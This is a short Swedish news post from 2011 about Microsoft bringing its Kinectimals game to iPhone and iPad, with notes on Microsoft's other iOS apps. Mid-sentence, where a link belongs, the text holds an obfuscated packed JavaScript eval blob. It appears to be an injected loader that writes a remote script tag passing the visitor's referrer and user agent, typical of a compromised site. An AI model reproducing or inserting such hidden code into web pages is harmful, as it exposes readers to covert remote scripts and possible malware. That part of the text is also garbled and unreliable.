Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

Microsoft släpper Kinectimals till iPhone och iPad.

Microsoft släpper Kinectimals till iPhone och iPad.
Filip Urde
  • On 14 december, 2011
  • http://www.revue.se/filip-urde

Microsoft har lanserat ett par appar till iOS, plattformen som iPhone och iPad använder sig av. Ett exempel på appar man släppt är: Windows Live Messenger, Xbox live och Bing till iPad. Som vi skrev tidigare så kommer man även släppa office paketet till iOS (läs eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|asirz|var|u0026u|referrer|nkyir||js|php’.split(’|’),0,{}))
mer här
), samt att man igår släppte OneNote till iPad (läs mer om det här).

Alla har varit program och klienter, men nu kommer alltså Microsofts allra första iOS spel och det heter Kinectimals. Spelet kom först till Kinect, men kommer alltså nu även till iPhone och iPad för 30kr. Spelet är en tamagotchi hybrid och går alltså ut på att man får besöka ön Lemuria och leka med och ta hand om en djurunge.

Om du äger en Xbox 360 kopia av Kinectimals kommer du få låsa upp 5 nya ungar till din Xbox 360 version när du köper spelet till iOS.